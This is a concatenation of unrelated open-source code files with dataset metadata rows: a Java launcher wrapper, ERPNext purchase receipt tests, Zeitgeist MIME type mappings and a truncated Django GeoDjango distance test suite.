    where the first three elements are lists of strings and exec_dir is the
    requested execution directory (a string) or None when --exec_dir is absent.
"""
mem_opts = []
prop_opts = []
pass_args = []
exec_dir = None
for arg in argv:
if arg.startswith('-D'):
prop_opts.append(arg)
elif arg.startswith('-XX'):
prop_opts.append(arg)
elif arg.startswith('-Xm'):
mem_opts.append(arg)
elif arg.startswith('--exec_dir='):
exec_dir = arg.split('=')[1].strip('"').strip("'")
if not os.path.exists(exec_dir):
shutil.copytree(real_dirname(sys.argv[0]), exec_dir, symlinks=False, ignore=None)
else:
pass_args.append(arg)
# In the original shell script the test coded below read:
# if [ "$jvm_mem_opts" == "" ] && [ -z ${_JAVA_OPTIONS+x} ]
# To reproduce the behaviour of the above shell code fragment
    # it is important to explicitly check for equality with None
# in the second condition, so a null envar value counts as True!
if mem_opts == [] and getenv('_JAVA_OPTIONS') is None:
mem_opts = default_jvm_mem_opts
return (mem_opts, prop_opts, pass_args, exec_dir)
def main():
"""
PeptideShaker updates files relative to the path of the jar file.
In a multiuser setting, the option --exec_dir="exec_dir"
can be used as the location for the peptide-shaker distribution.
    If the exec_dir does not exist,
we copy the jar file, lib, and resources to the exec_dir directory.
"""
java = java_executable()
(mem_opts, prop_opts, pass_args, exec_dir) = jvm_opts(sys.argv[1:])
jar_dir = exec_dir if exec_dir else real_dirname(sys.argv[0])
if pass_args != [] and pass_args[0].startswith('eu'):
jar_arg = '-cp'
else:
jar_arg = '-jar'
jar_path = os.path.join(jar_dir, jar_file)
java_args = [java] + mem_opts + prop_opts + [jar_arg] + [jar_path] + pass_args
sys.exit(subprocess.call(java_args))
if __name__ == '__main__':
main()
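# Illustrative invocation of this wrapper (the paths and trailing tool
# arguments are assumptions, not part of the recipe): -Xm*/-D/-XX options are
# routed to the JVM by jvm_opts(), --exec_dir relocates the jar directory, and
# everything else is passed through to the jar unchanged, e.g.
#
#   biopet-vcfstats -Xmx4g -Dfile.encoding=UTF-8 --exec_dir="$HOME/biopet-exec" <tool args...>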
| mit | -6,006,615,689,996,553,000 | -205,897,438,320,255,330 | 30.46729 | 101 | 0.644194 | false |
YuriGural/erpnext | erpnext/stock/doctype/purchase_receipt/test_purchase_receipt.py | 10 | 10589 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import unittest
import frappe, erpnext
import frappe.defaults
from frappe.utils import cint, flt, cstr, today
from erpnext.stock.doctype.purchase_receipt.purchase_receipt import make_purchase_invoice
from erpnext import set_perpetual_inventory
from erpnext.accounts.doctype.account.test_account import get_inventory_account
class TestPurchaseReceipt(unittest.TestCase):
def setUp(self):
frappe.db.set_value("Buying Settings", None, "allow_multiple_items", 1)
def test_make_purchase_invoice(self):
pr = make_purchase_receipt(do_not_save=True)
self.assertRaises(frappe.ValidationError, make_purchase_invoice, pr.name)
pr.submit()
pi = make_purchase_invoice(pr.name)
self.assertEquals(pi.doctype, "Purchase Invoice")
self.assertEquals(len(pi.get("items")), len(pr.get("items")))
# modify rate
pi.get("items")[0].rate = 200
self.assertRaises(frappe.ValidationError, frappe.get_doc(pi).submit)
def test_purchase_receipt_no_gl_entry(self):
company = frappe.db.get_value('Warehouse', '_Test Warehouse - _TC', 'company')
set_perpetual_inventory(0, company)
existing_bin_stock_value = frappe.db.get_value("Bin", {"item_code": "_Test Item",
"warehouse": "_Test Warehouse - _TC"}, "stock_value")
pr = make_purchase_receipt()
stock_value_difference = frappe.db.get_value("Stock Ledger Entry",
{"voucher_type": "Purchase Receipt", "voucher_no": pr.name,
"item_code": "_Test Item", "warehouse": "_Test Warehouse - _TC"}, "stock_value_difference")
self.assertEqual(stock_value_difference, 250)
current_bin_stock_value = frappe.db.get_value("Bin", {"item_code": "_Test Item",
"warehouse": "_Test Warehouse - _TC"}, "stock_value")
self.assertEqual(current_bin_stock_value, existing_bin_stock_value + 250)
self.assertFalse(get_gl_entries("Purchase Receipt", pr.name))
def test_purchase_receipt_gl_entry(self):
pr = frappe.copy_doc(test_records[0])
set_perpetual_inventory(1, pr.company)
self.assertEqual(cint(erpnext.is_perpetual_inventory_enabled(pr.company)), 1)
pr.insert()
pr.submit()
gl_entries = get_gl_entries("Purchase Receipt", pr.name)
self.assertTrue(gl_entries)
stock_in_hand_account = get_inventory_account(pr.company, pr.get("items")[0].warehouse)
fixed_asset_account = get_inventory_account(pr.company, pr.get("items")[1].warehouse)
if stock_in_hand_account == fixed_asset_account:
expected_values = {
stock_in_hand_account: [750.0, 0.0],
"Stock Received But Not Billed - _TC": [0.0, 500.0],
"Expenses Included In Valuation - _TC": [0.0, 250.0]
}
else:
expected_values = {
stock_in_hand_account: [375.0, 0.0],
fixed_asset_account: [375.0, 0.0],
"Stock Received But Not Billed - _TC": [0.0, 500.0],
"Expenses Included In Valuation - _TC": [0.0, 250.0]
}
for gle in gl_entries:
self.assertEquals(expected_values[gle.account][0], gle.debit)
self.assertEquals(expected_values[gle.account][1], gle.credit)
pr.cancel()
self.assertFalse(get_gl_entries("Purchase Receipt", pr.name))
set_perpetual_inventory(0, pr.company)
def test_subcontracting(self):
from erpnext.stock.doctype.stock_entry.test_stock_entry import make_stock_entry
make_stock_entry(item_code="_Test Item", target="_Test Warehouse 1 - _TC", qty=100, basic_rate=100)
make_stock_entry(item_code="_Test Item Home Desktop 100", target="_Test Warehouse 1 - _TC",
qty=100, basic_rate=100)
pr = make_purchase_receipt(item_code="_Test FG Item", qty=10, rate=500, is_subcontracted="Yes")
self.assertEquals(len(pr.get("supplied_items")), 2)
rm_supp_cost = sum([d.amount for d in pr.get("supplied_items")])
self.assertEquals(pr.get("items")[0].rm_supp_cost, flt(rm_supp_cost, 2))
def test_serial_no_supplier(self):
pr = make_purchase_receipt(item_code="_Test Serialized Item With Series", qty=1)
self.assertEquals(frappe.db.get_value("Serial No", pr.get("items")[0].serial_no, "supplier"),
pr.supplier)
pr.cancel()
self.assertFalse(frappe.db.get_value("Serial No", pr.get("items")[0].serial_no, "warehouse"))
def test_rejected_serial_no(self):
pr = frappe.copy_doc(test_records[0])
pr.get("items")[0].item_code = "_Test Serialized Item With Series"
pr.get("items")[0].qty = 3
pr.get("items")[0].rejected_qty = 2
pr.get("items")[0].received_qty = 5
pr.get("items")[0].rejected_warehouse = "_Test Rejected Warehouse - _TC"
pr.insert()
pr.submit()
accepted_serial_nos = pr.get("items")[0].serial_no.split("\n")
self.assertEquals(len(accepted_serial_nos), 3)
for serial_no in accepted_serial_nos:
self.assertEquals(frappe.db.get_value("Serial No", serial_no, "warehouse"),
pr.get("items")[0].warehouse)
rejected_serial_nos = pr.get("items")[0].rejected_serial_no.split("\n")
self.assertEquals(len(rejected_serial_nos), 2)
for serial_no in rejected_serial_nos:
self.assertEquals(frappe.db.get_value("Serial No", serial_no, "warehouse"),
pr.get("items")[0].rejected_warehouse)
def test_purchase_return(self):
set_perpetual_inventory()
pr = make_purchase_receipt()
return_pr = make_purchase_receipt(is_return=1, return_against=pr.name, qty=-2)
# check sle
outgoing_rate = frappe.db.get_value("Stock Ledger Entry", {"voucher_type": "Purchase Receipt",
"voucher_no": return_pr.name}, "outgoing_rate")
self.assertEqual(outgoing_rate, 50)
# check gl entries for return
gl_entries = get_gl_entries("Purchase Receipt", return_pr.name)
self.assertTrue(gl_entries)
stock_in_hand_account = get_inventory_account(return_pr.company)
expected_values = {
stock_in_hand_account: [0.0, 100.0],
"Stock Received But Not Billed - _TC": [100.0, 0.0],
}
for gle in gl_entries:
self.assertEquals(expected_values[gle.account][0], gle.debit)
self.assertEquals(expected_values[gle.account][1], gle.credit)
set_perpetual_inventory(0)
def test_purchase_return_for_rejected_qty(self):
set_perpetual_inventory()
pr = make_purchase_receipt(received_qty=4, qty=2)
return_pr = make_purchase_receipt(is_return=1, return_against=pr.name, received_qty = -4, qty=-2)
actual_qty = frappe.db.get_value("Stock Ledger Entry", {"voucher_type": "Purchase Receipt",
"voucher_no": return_pr.name, 'warehouse': return_pr.items[0].rejected_warehouse}, "actual_qty")
self.assertEqual(actual_qty, -2)
set_perpetual_inventory(0)
def test_purchase_return_for_serialized_items(self):
def _check_serial_no_values(serial_no, field_values):
serial_no = frappe.get_doc("Serial No", serial_no)
for field, value in field_values.items():
self.assertEquals(cstr(serial_no.get(field)), value)
from erpnext.stock.doctype.serial_no.serial_no import get_serial_nos
pr = make_purchase_receipt(item_code="_Test Serialized Item With Series", qty=1)
serial_no = get_serial_nos(pr.get("items")[0].serial_no)[0]
_check_serial_no_values(serial_no, {
"warehouse": "_Test Warehouse - _TC",
"purchase_document_no": pr.name
})
return_pr = make_purchase_receipt(item_code="_Test Serialized Item With Series", qty=-1,
is_return=1, return_against=pr.name, serial_no=serial_no)
_check_serial_no_values(serial_no, {
"warehouse": "",
"purchase_document_no": pr.name,
"delivery_document_no": return_pr.name
})
def test_closed_purchase_receipt(self):
from erpnext.stock.doctype.purchase_receipt.purchase_receipt import update_purchase_receipt_status
pr = make_purchase_receipt(do_not_submit=True)
pr.submit()
update_purchase_receipt_status(pr.name, "Closed")
self.assertEquals(frappe.db.get_value("Purchase Receipt", pr.name, "status"), "Closed")
def test_pr_billing_status(self):
# PO -> PR1 -> PI and PO -> PI and PO -> PR2
from erpnext.buying.doctype.purchase_order.test_purchase_order import create_purchase_order
from erpnext.buying.doctype.purchase_order.purchase_order \
import make_purchase_receipt, make_purchase_invoice as make_purchase_invoice_from_po
po = create_purchase_order()
pr1 = make_purchase_receipt(po.name)
pr1.posting_date = today()
pr1.posting_time = "10:00"
pr1.get("items")[0].received_qty = 2
pr1.get("items")[0].qty = 2
pr1.submit()
pi1 = make_purchase_invoice(pr1.name)
pi1.submit()
pr1.load_from_db()
self.assertEqual(pr1.per_billed, 100)
pi2 = make_purchase_invoice_from_po(po.name)
pi2.get("items")[0].qty = 4
pi2.submit()
pr2 = make_purchase_receipt(po.name)
pr2.posting_date = today()
pr2.posting_time = "08:00"
pr2.get("items")[0].received_qty = 5
pr2.get("items")[0].qty = 5
pr2.submit()
pr1.load_from_db()
self.assertEqual(pr1.get("items")[0].billed_amt, 1000)
self.assertEqual(pr1.per_billed, 100)
self.assertEqual(pr1.status, "Completed")
self.assertEqual(pr2.get("items")[0].billed_amt, 2000)
self.assertEqual(pr2.per_billed, 80)
self.assertEqual(pr2.status, "To Bill")
def get_gl_entries(voucher_type, voucher_no):
return frappe.db.sql("""select account, debit, credit
from `tabGL Entry` where voucher_type=%s and voucher_no=%s
order by account desc""", (voucher_type, voucher_no), as_dict=1)
def make_purchase_receipt(**args):
frappe.db.set_value("Buying Settings", None, "allow_multiple_items", 1)
pr = frappe.new_doc("Purchase Receipt")
args = frappe._dict(args)
pr.posting_date = args.posting_date or today()
if args.posting_time:
pr.posting_time = args.posting_time
pr.company = args.company or "_Test Company"
pr.supplier = args.supplier or "_Test Supplier"
pr.is_subcontracted = args.is_subcontracted or "No"
pr.supplier_warehouse = "_Test Warehouse 1 - _TC"
pr.currency = args.currency or "INR"
pr.is_return = args.is_return
pr.return_against = args.return_against
qty = args.qty or 5
received_qty = args.received_qty or qty
rejected_qty = args.rejected_qty or flt(received_qty) - flt(qty)
pr.append("items", {
"item_code": args.item or args.item_code or "_Test Item",
"warehouse": args.warehouse or "_Test Warehouse - _TC",
"qty": qty,
"received_qty": received_qty,
"rejected_qty": rejected_qty,
"rejected_warehouse": args.rejected_warehouse or "_Test Rejected Warehouse - _TC" if rejected_qty != 0 else "",
"rate": args.rate or 50,
"conversion_factor": 1.0,
"serial_no": args.serial_no,
"stock_uom": "_Test UOM"
})
if not args.do_not_save:
pr.insert()
if not args.do_not_submit:
pr.submit()
return pr
test_dependencies = ["BOM", "Item Price"]
test_records = frappe.get_test_records('Purchase Receipt')
| gpl-3.0 | 7,247,263,011,429,663,000 | 3,204,564,789,386,264,000 | 34.533557 | 113 | 0.702238 | false |
yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/zeitgeist/mimetypes.py | 3 | 10501 | # -.- coding: utf-8 -.-
# Zeitgeist
#
# Copyright © 2010 Markus Korn <[email protected]>
# Copyright © 2010 Canonical Ltd.
# By Mikkel Kamstrup Erlandsen <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2.1 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
from datamodel import Interpretation, Manifestation
__all__ = [
"get_interpretation_for_mimetype",
"get_manifestation_for_uri",
]
class RegExpr(object):
""" Helper class which holds a compiled regular expression
and its pattern."""
def __init__(self, pattern):
self.pattern = pattern
self.regex = re.compile(self.pattern)
def __str__(self):
return self.pattern
def __getattr__(self, name):
return getattr(self.regex, name)
def make_regex_tuple(*items):
return tuple((RegExpr(k), v) for k, v in items)
def get_interpretation_for_mimetype(mimetype):
""" get interpretation for a given mimetype, returns :const:`None`
if none of the predefined interpretations matches
"""
interpretation = MIMES.get(mimetype, None)
if interpretation is not None:
return interpretation
for pattern, interpretation in MIMES_REGEX:
if pattern.match(mimetype):
return interpretation
return None
def get_manifestation_for_uri(uri):
""" Lookup Manifestation for a given uri based on the scheme part,
returns :const:`None` if no suitable manifestation is found
"""
for scheme, manifestation in SCHEMES:
if uri.startswith(scheme):
return manifestation
return None
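# Illustrative lookups (a sketch based on the MIMES/MIMES_REGEX/SCHEMES tables
# defined below, not part of the public documentation):
#
#   >>> get_interpretation_for_mimetype("image/png") == Interpretation.RASTER_IMAGE
#   True
#   >>> get_interpretation_for_mimetype("video/ogg") == Interpretation.VIDEO   # matched via MIMES_REGEX
#   True
#   >>> get_manifestation_for_uri("file:///tmp/note.txt") == Manifestation.FILE_DATA_OBJECT
#   True
#   >>> get_manifestation_for_uri("mailto:[email protected]") is None   # unknown scheme
#   True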
MIMES = {
# x-applix-*
"application/x-applix-word": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/x-applix-spreadsheet": Interpretation.SPREADSHEET,
"application/x-applix-presents": Interpretation.PRESENTATION,
# x-kword, x-kspread, x-kpresenter, x-killustrator
"application/x-kword": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/x-kspread": Interpretation.SPREADSHEET,
"application/x-kpresenter": Interpretation.PRESENTATION,
"application/x-killustrator": Interpretation.VECTOR_IMAGE,
# MS
"application/ms-powerpoint": Interpretation.PRESENTATION,
"application/vnd.ms-powerpoint": Interpretation.PRESENTATION,
"application/msword": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/msexcel": Interpretation.SPREADSHEET,
"application/ms-excel": Interpretation.SPREADSHEET,
"application/vnd.ms-excel": Interpretation.SPREADSHEET,
# pdf, postscript et al
"application/pdf": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/postscript": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/ps": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/rtf": Interpretation.PAGINATED_TEXT_DOCUMENT,
"image/vnd.djvu": Interpretation.PAGINATED_TEXT_DOCUMENT,
# GNOME office
"application/x-abiword": Interpretation.PAGINATED_TEXT_DOCUMENT,
"application/x-gnucash": Interpretation.SPREADSHEET,
"application/x-gnumeric": Interpretation.SPREADSHEET,
# TeX stuff
"text/x-tex": Interpretation.SOURCE_CODE,
"text/x-latex": Interpretation.SOURCE_CODE,
# Plain text
"text/plain": Interpretation.TEXT_DOCUMENT,
"text/csv": Interpretation.TEXT_DOCUMENT,
# HTML files on disk are always HTML_DOCUMENTS while online we should
# assume them to be WEBSITEs. By default we anticipate local files...
"text/html": Interpretation.HTML_DOCUMENT,
# Image types
"application/vnd.corel-draw": Interpretation.VECTOR_IMAGE,
"image/jpeg": Interpretation.RASTER_IMAGE,
"image/pjpeg": Interpretation.RASTER_IMAGE,
"image/png": Interpretation.RASTER_IMAGE,
"image/tiff": Interpretation.RASTER_IMAGE,
"image/gif": Interpretation.RASTER_IMAGE,
"image/x-xcf": Interpretation.RASTER_IMAGE,
"image/svg+xml": Interpretation.VECTOR_IMAGE,
"image/vnd.microsoft.icon": Interpretation.ICON,
# Audio
"application/ogg": Interpretation.AUDIO,
"audio/x-scpls": Interpretation.MEDIA_LIST,
# Development files
"application/ecmascript": Interpretation.SOURCE_CODE,
"application/javascript": Interpretation.SOURCE_CODE,
"application/json": Interpretation.SOURCE_CODE,
"application/soap+xml": Interpretation.SOURCE_CODE,
"application/xml-dtd": Interpretation.SOURCE_CODE,
"application/x-csh": Interpretation.SOURCE_CODE,
"application/x-designer": Interpretation.SOURCE_CODE,
"application/x-dia-diagram": Interpretation.SOURCE_CODE,
"application/x-fluid": Interpretation.SOURCE_CODE,
"application/x-glade": Interpretation.SOURCE_CODE,
"application/xhtml+xml": Interpretation.SOURCE_CODE,
"application/x-java-archive": Interpretation.SOURCE_CODE,
"application/x-javascript": Interpretation.SOURCE_CODE,
"application/x-m4": Interpretation.SOURCE_CODE,
"application/xml": Interpretation.SOURCE_CODE,
"application/x-perl": Interpretation.SOURCE_CODE,
"application/x-php": Interpretation.SOURCE_CODE,
"application/x-ruby": Interpretation.SOURCE_CODE,
"application/x-shellscript": Interpretation.SOURCE_CODE,
"application/x-sql": Interpretation.SOURCE_CODE,
"text/css": Interpretation.SOURCE_CODE,
"text/javascript": Interpretation.SOURCE_CODE,
"text/xml": Interpretation.SOURCE_CODE,
"text/x-c": Interpretation.SOURCE_CODE,
"text/x-c++": Interpretation.SOURCE_CODE,
"text/x-chdr": Interpretation.SOURCE_CODE,
"text/x-copying": Interpretation.SOURCE_CODE,
"text/x-credits": Interpretation.SOURCE_CODE,
"text/x-csharp": Interpretation.SOURCE_CODE,
"text/x-c++src": Interpretation.SOURCE_CODE,
"text/x-csrc": Interpretation.SOURCE_CODE,
"text/x-dsrc": Interpretation.SOURCE_CODE,
"text/x-eiffel": Interpretation.SOURCE_CODE,
"text/x-gettext-translation": Interpretation.SOURCE_CODE,
"text/x-gettext-translation-template": Interpretation.SOURCE_CODE,
"text/x-haskell": Interpretation.SOURCE_CODE,
"text/x-idl": Interpretation.SOURCE_CODE,
"text/x-java": Interpretation.SOURCE_CODE,
"text/x-lisp": Interpretation.SOURCE_CODE,
"text/x-lua": Interpretation.SOURCE_CODE,
"text/x-makefile": Interpretation.SOURCE_CODE,
"text/x-objcsrc": Interpretation.SOURCE_CODE,
"text/x-ocaml": Interpretation.SOURCE_CODE,
"text/x-pascal": Interpretation.SOURCE_CODE,
"text/x-patch": Interpretation.SOURCE_CODE,
"text/x-python": Interpretation.SOURCE_CODE,
"text/x-sql": Interpretation.SOURCE_CODE,
"text/x-tcl": Interpretation.SOURCE_CODE,
"text/x-troff": Interpretation.SOURCE_CODE,
"text/x-vala": Interpretation.SOURCE_CODE,
"text/x-vhdl": Interpretation.SOURCE_CODE,
"text/x-m4": Interpretation.SOURCE_CODE,
"text/x-jquery-tmpl": Interpretation.SOURCE_CODE,
# Email
"message/alternative": Interpretation.EMAIL,
"message/partial": Interpretation.EMAIL,
"message/related": Interpretation.EMAIL,
# People
"text/vcard": Interpretation.CONTACT,
# Archives
"application/zip": Interpretation.ARCHIVE,
"application/x-gzip": Interpretation.ARCHIVE,
"application/x-bzip": Interpretation.ARCHIVE,
"application/x-lzma": Interpretation.ARCHIVE,
"application/x-archive": Interpretation.ARCHIVE,
"application/x-7z-compressed": Interpretation.ARCHIVE,
"application/x-bzip-compressed-tar": Interpretation.ARCHIVE,
"application/x-lzma-compressed-tar": Interpretation.ARCHIVE,
"application/x-compressed-tar": Interpretation.ARCHIVE,
"application/x-stuffit": Interpretation.ARCHIVE,
# Software and packages
"application/x-deb": Interpretation.SOFTWARE,
"application/x-rpm": Interpretation.SOFTWARE,
"application/x-ms-dos-executable": Interpretation.SOFTWARE,
"application/x-executable": Interpretation.SOFTWARE,
"application/x-desktop": Interpretation.SOFTWARE,
"application/x-shockwave-flash": Interpretation.EXECUTABLE,
# File systems
"application/x-cd-image": Interpretation.FILESYSTEM_IMAGE,
"inode/directory": Interpretation.FOLDER,
}
MIMES_REGEX = make_regex_tuple(
# Star Office and OO.org
("application/vnd.oasis.opendocument.text.*", Interpretation.PAGINATED_TEXT_DOCUMENT),
("application/vnd.oasis.opendocument.presentation.*", Interpretation.PRESENTATION),
("application/vnd.oasis.opendocument.spreadsheet.*", Interpretation.SPREADSHEET),
("application/vnd.oasis.opendocument.graphics.*", Interpretation.VECTOR_IMAGE),
("application/vnd\\..*", Interpretation.DOCUMENT),
# x-applix-*
("application/x-applix-.*", Interpretation.DOCUMENT),
# MS
("application/vnd.ms-excel.*", Interpretation.SPREADSHEET),
("application/vnd.ms-powerpoint.*", Interpretation.PRESENTATION),
("application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.*", Interpretation.SPREADSHEET),
("application/vnd.openxmlformats-officedocument.presentationml.presentation.*", Interpretation.PRESENTATION),
("application/vnd.openxmlformats-officedocument.wordprocessingml.document.*", Interpretation.PAGINATED_TEXT_DOCUMENT),
# TeX stuff
(".*/x-dvi", Interpretation.PAGINATED_TEXT_DOCUMENT),
# Image types
("image/.*", Interpretation.IMAGE),
# Audio
("audio/.*", Interpretation.AUDIO),
# Video
("video/.*", Interpretation.VIDEO),
)
SCHEMES = tuple((
("file://", Manifestation.FILE_DATA_OBJECT),
("http://", Manifestation.WEB_DATA_OBJECT),
("https://", Manifestation.WEB_DATA_OBJECT),
("ssh://", Manifestation.REMOTE_DATA_OBJECT),
("sftp://", Manifestation.REMOTE_DATA_OBJECT),
("ftp://", Manifestation.REMOTE_DATA_OBJECT),
("dav://", Manifestation.REMOTE_DATA_OBJECT),
("davs://", Manifestation.REMOTE_DATA_OBJECT),
("smb://", Manifestation.REMOTE_DATA_OBJECT),
))
# vim:noexpandtab:ts=4:sw=4
| mit | 4,473,382,630,904,761,300 | -145,166,229,906,814,700 | 40.498024 | 122 | 0.714544 | false |
sodafree/backend | build/lib.linux-i686-2.7/django/contrib/gis/tests/distapp/tests.py | 96 | 19051 | from __future__ import absolute_import
from django.db import connection
from django.db.models import Q
from django.contrib.gis.geos import GEOSGeometry, LineString
from django.contrib.gis.measure import D # alias for Distance
from django.contrib.gis.tests.utils import oracle, postgis, spatialite, no_oracle, no_spatialite
from django.test import TestCase
from .models import (AustraliaCity, Interstate, SouthTexasInterstate,
SouthTexasCity, SouthTexasCityFt, CensusZipcode, SouthTexasZipcode)
class DistanceTest(TestCase):
# A point we are testing distances with -- using a WGS84
    # coordinate that'll be implicitly transformed to
# the coordinate system of the field, EPSG:32140 (Texas South Central
# w/units in meters)
stx_pnt = GEOSGeometry('POINT (-95.370401017314293 29.704867409475465)', 4326)
# Another one for Australia
au_pnt = GEOSGeometry('POINT (150.791 -34.4919)', 4326)
def get_names(self, qs):
cities = [c.name for c in qs]
cities.sort()
return cities
def test01_init(self):
"Test initialization of distance models."
self.assertEqual(9, SouthTexasCity.objects.count())
self.assertEqual(9, SouthTexasCityFt.objects.count())
self.assertEqual(11, AustraliaCity.objects.count())
self.assertEqual(4, SouthTexasZipcode.objects.count())
self.assertEqual(4, CensusZipcode.objects.count())
self.assertEqual(1, Interstate.objects.count())
self.assertEqual(1, SouthTexasInterstate.objects.count())
@no_spatialite
def test02_dwithin(self):
"Testing the `dwithin` lookup type."
# Distances -- all should be equal (except for the
# degree/meter pair in au_cities, that's somewhat
# approximate).
tx_dists = [(7000, 22965.83), D(km=7), D(mi=4.349)]
au_dists = [(0.5, 32000), D(km=32), D(mi=19.884)]
# Expected cities for Australia and Texas.
tx_cities = ['Downtown Houston', 'Southside Place']
au_cities = ['Mittagong', 'Shellharbour', 'Thirroul', 'Wollongong']
# Performing distance queries on two projected coordinate systems one
# with units in meters and the other in units of U.S. survey feet.
for dist in tx_dists:
if isinstance(dist, tuple): dist1, dist2 = dist
else: dist1 = dist2 = dist
qs1 = SouthTexasCity.objects.filter(point__dwithin=(self.stx_pnt, dist1))
qs2 = SouthTexasCityFt.objects.filter(point__dwithin=(self.stx_pnt, dist2))
for qs in qs1, qs2:
self.assertEqual(tx_cities, self.get_names(qs))
# Now performing the `dwithin` queries on a geodetic coordinate system.
for dist in au_dists:
if isinstance(dist, D) and not oracle: type_error = True
else: type_error = False
if isinstance(dist, tuple):
if oracle: dist = dist[1]
else: dist = dist[0]
# Creating the query set.
qs = AustraliaCity.objects.order_by('name')
if type_error:
# A ValueError should be raised on PostGIS when trying to pass
# Distance objects into a DWithin query using a geodetic field.
self.assertRaises(ValueError, AustraliaCity.objects.filter(point__dwithin=(self.au_pnt, dist)).count)
else:
self.assertEqual(au_cities, self.get_names(qs.filter(point__dwithin=(self.au_pnt, dist))))
def test03a_distance_method(self):
"Testing the `distance` GeoQuerySet method on projected coordinate systems."
# The point for La Grange, TX
lagrange = GEOSGeometry('POINT(-96.876369 29.905320)', 4326)
# Reference distances in feet and in meters. Got these values from
# using the provided raw SQL statements.
# SELECT ST_Distance(point, ST_Transform(ST_GeomFromText('POINT(-96.876369 29.905320)', 4326), 32140)) FROM distapp_southtexascity;
m_distances = [147075.069813, 139630.198056, 140888.552826,
138809.684197, 158309.246259, 212183.594374,
70870.188967, 165337.758878, 139196.085105]
# SELECT ST_Distance(point, ST_Transform(ST_GeomFromText('POINT(-96.876369 29.905320)', 4326), 2278)) FROM distapp_southtexascityft;
        # Oracle 11 thinks this is not a projected coordinate system, so it's
# not tested.
ft_distances = [482528.79154625, 458103.408123001, 462231.860397575,
455411.438904354, 519386.252102563, 696139.009211594,
232513.278304279, 542445.630586414, 456679.155883207]
# Testing using different variations of parameters and using models
# with different projected coordinate systems.
dist1 = SouthTexasCity.objects.distance(lagrange, field_name='point')
dist2 = SouthTexasCity.objects.distance(lagrange) # Using GEOSGeometry parameter
if spatialite or oracle:
dist_qs = [dist1, dist2]
else:
dist3 = SouthTexasCityFt.objects.distance(lagrange.ewkt) # Using EWKT string parameter.
dist4 = SouthTexasCityFt.objects.distance(lagrange)
dist_qs = [dist1, dist2, dist3, dist4]
# Original query done on PostGIS, have to adjust AlmostEqual tolerance
# for Oracle.
if oracle: tol = 2
else: tol = 5
# Ensuring expected distances are returned for each distance queryset.
for qs in dist_qs:
for i, c in enumerate(qs):
self.assertAlmostEqual(m_distances[i], c.distance.m, tol)
self.assertAlmostEqual(ft_distances[i], c.distance.survey_ft, tol)
@no_spatialite
def test03b_distance_method(self):
"Testing the `distance` GeoQuerySet method on geodetic coordnate systems."
if oracle: tol = 2
else: tol = 5
# Testing geodetic distance calculation with a non-point geometry
# (a LineString of Wollongong and Shellharbour coords).
ls = LineString( ( (150.902, -34.4245), (150.87, -34.5789) ) )
if oracle or connection.ops.geography:
# Reference query:
# SELECT ST_distance_sphere(point, ST_GeomFromText('LINESTRING(150.9020 -34.4245,150.8700 -34.5789)', 4326)) FROM distapp_australiacity ORDER BY name;
distances = [1120954.92533513, 140575.720018241, 640396.662906304,
60580.9693849269, 972807.955955075, 568451.8357838,
40435.4335201384, 0, 68272.3896586844, 12375.0643697706, 0]
qs = AustraliaCity.objects.distance(ls).order_by('name')
for city, distance in zip(qs, distances):
# Testing equivalence to within a meter.
self.assertAlmostEqual(distance, city.distance.m, 0)
else:
            # PostGIS 1.4 and below is limited to distance queries only
# to/from point geometries, check for raising of ValueError.
self.assertRaises(ValueError, AustraliaCity.objects.distance, ls)
self.assertRaises(ValueError, AustraliaCity.objects.distance, ls.wkt)
# Got the reference distances using the raw SQL statements:
# SELECT ST_distance_spheroid(point, ST_GeomFromText('POINT(151.231341 -33.952685)', 4326), 'SPHEROID["WGS 84",6378137.0,298.257223563]') FROM distapp_australiacity WHERE (NOT (id = 11));
# SELECT ST_distance_sphere(point, ST_GeomFromText('POINT(151.231341 -33.952685)', 4326)) FROM distapp_australiacity WHERE (NOT (id = 11)); st_distance_sphere
if connection.ops.postgis and connection.ops.proj_version_tuple() >= (4, 7, 0):
# PROJ.4 versions 4.7+ have updated datums, and thus different
# distance values.
spheroid_distances = [60504.0628957201, 77023.9489850262, 49154.8867574404,
90847.4358768573, 217402.811919332, 709599.234564757,
640011.483550888, 7772.00667991925, 1047861.78619339,
1165126.55236034]
sphere_distances = [60580.9693849267, 77144.0435286473, 49199.4415344719,
90804.7533823494, 217713.384600405, 709134.127242793,
639828.157159169, 7786.82949717788, 1049204.06569028,
1162623.7238134]
else:
spheroid_distances = [60504.0628825298, 77023.948962654, 49154.8867507115,
90847.435881812, 217402.811862568, 709599.234619957,
640011.483583758, 7772.00667666425, 1047861.7859506,
1165126.55237647]
sphere_distances = [60580.7612632291, 77143.7785056615, 49199.2725132184,
90804.4414289463, 217712.63666124, 709131.691061906,
639825.959074112, 7786.80274606706, 1049200.46122281,
1162619.7297006]
# Testing with spheroid distances first.
hillsdale = AustraliaCity.objects.get(name='Hillsdale')
qs = AustraliaCity.objects.exclude(id=hillsdale.id).distance(hillsdale.point, spheroid=True)
for i, c in enumerate(qs):
self.assertAlmostEqual(spheroid_distances[i], c.distance.m, tol)
if postgis:
# PostGIS uses sphere-only distances by default, testing these as well.
qs = AustraliaCity.objects.exclude(id=hillsdale.id).distance(hillsdale.point)
for i, c in enumerate(qs):
self.assertAlmostEqual(sphere_distances[i], c.distance.m, tol)
@no_oracle # Oracle already handles geographic distance calculation.
def test03c_distance_method(self):
"Testing the `distance` GeoQuerySet method used with `transform` on a geographic field."
# Normally you can't compute distances from a geometry field
# that is not a PointField (on PostGIS 1.4 and below).
if not connection.ops.geography:
self.assertRaises(ValueError, CensusZipcode.objects.distance, self.stx_pnt)
